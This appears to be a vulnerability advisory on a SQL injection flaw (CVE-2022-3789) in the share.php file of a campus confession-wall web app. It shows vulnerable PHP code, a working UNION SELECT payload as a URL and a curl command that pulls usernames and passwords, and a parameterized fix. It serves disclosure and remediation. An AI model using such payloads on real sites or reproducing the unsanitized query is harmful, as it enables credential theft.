Summary:  
A critical security flaw (CVE-2022-3789) was discovered in Tim Campus Confession Wall—a platform popular with university students for posting anonymous confessions. The vulnerability is a SQL injection found in the share.php file, specifically in the way it handles the post_id parameter. Attackers can exploit this flaw to manipulate the database, steal sensitive data, or gain unauthorized access. This issue is tracked under VDB-212611.

In this article, we’ll break down how the vulnerability works, show code snippets related to the flaw, examine proof-of-concept exploitation, and provide practical advice for remediation. We’ll also link to original references for further reading.

What is SQL Injection?

SQL injection happens when an application builds a SQL statement out of untrusted input, so that text supplied by an attacker is executed as part of the query. A website that does not properly sanitize or parameterize user input lets attackers interfere directly with the database.

Vulnerability Details: Where’s the Problem?

The problem lies in the share.php script—a core part of the Tim Campus Confession Wall platform. The script uses the post_id GET or POST parameter to fetch database records. Unfortunately, this value isn’t properly sanitized or parameterized, allowing attackers to inject raw SQL.

Affected File: share.php  
Vulnerable Parameter: post_id  
Vulnerability Type: SQL Injection  
CVE ID: CVE-2022-3789  
VDB Reference: VDB-212611

Let’s look at a vulnerable PHP code example similar to what’s found in share.php:

<?php
// share.php

include("db.php");

if (isset($_GET['post_id'])) {
    $post_id = $_GET['post_id'];
    // Vulnerable query: $post_id is NOT sanitized!
    $result = mysqli_query($conn, "SELECT * FROM posts WHERE id = $post_id");
    $row = mysqli_fetch_assoc($result);
    echo $row['confession'];
}
?>

Problem:
The $post_id variable is used directly in the SQL query, giving attackers full control over the query statement.

Exploit Example

With no input checking, attackers can run arbitrary queries. Here’s how an attacker could exploit this vulnerability to dump the first user in the users table:

Malicious URL

https://example.com/share.php?post_id=1%20UNION%20SELECT%201,username,password%20FROM%20users%20LIMIT%201;--

Sample POC request using curl

curl 'https://example.com/share.php?post_id=1 UNION SELECT 1,username,password FROM users LIMIT 1;--'

If no protections are in place, the confession text may now show a username or hashed password.

Threat Impact

- Data Leak: Attackers can access, modify, or even delete confidential confession posts or user credentials.

- Account Takeover: If users (like admins) reuse passwords, their accounts are at risk.

- Further Attacks: Gained access can be used to deploy malware, deface content, or pivot deeper into the infrastructure.

Never interpolate user input directly into SQL. Use parameterized queries instead.
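One way to apply that advice to the snippet shown earlier, as an added example rather than the project's actual patch. It assumes, as that snippet does, that db.php defines $conn as a mysqli connection and that the posts table has an integer id column and a confession column.

```php
<?php
// share.php, hardened sketch (added example, not the project's own code).
// Assumptions taken from the vulnerable snippet: db.php defines $conn (mysqli),
// and posts has an integer "id" column and a "confession" column.

include("db.php");

// Make mysqli throw exceptions so query failures are handled in one place.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// 1. Validate: post_id must be a positive integer. Anything else is rejected
//    before it gets near the database.
$post_id = filter_input(INPUT_GET, 'post_id', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);
if ($post_id === null || $post_id === false) {
    http_response_code(400);
    exit('Invalid post_id');
}

try {
    // 2. Parameterize: the SQL text is fixed, and the value is bound
    //    separately, so it is never parsed as SQL.
    $stmt = mysqli_prepare($conn, "SELECT confession FROM posts WHERE id = ?");
    mysqli_stmt_bind_param($stmt, "i", $post_id);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $confession);
    $found = mysqli_stmt_fetch($stmt); // true = row, null = no row
    mysqli_stmt_close($stmt);
} catch (mysqli_sql_exception $e) {
    // 3. Log details server-side; never echo database errors to the client.
    error_log('share.php query failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error');
}

if ($found !== true) {
    http_response_code(404);
    exit('Post not found');
}

// 4. Encode on output: confession text is user-supplied, so escape it for HTML.
echo htmlspecialchars($confession, ENT_QUOTES, 'UTF-8');
```

Selecting only the confession column, instead of `SELECT *`, also limits what the page can ever return from this query.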

References & Sources

- Official CVE Entry – CVE-2022-3789  
- VulDB Entry – VDB-212611  
- OWASP: SQL Injection

Conclusion

CVE-2022-3789 in Tim Campus Confession Wall’s share.php is a dangerous, public SQL injection flaw (VDB-212611). If you host or develop for this platform, take immediate action. Script kiddies and advanced attackers alike are already aware of this bug, and exploitation tools are widely available. Update your code as shown above, audit other entry points, and prioritize security awareness in your web development processes.

> If you’re a user: avoid entering personal data on vulnerable platforms, and change your passwords if you think you might be exposed.

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/03/2022 14:51:00 UTC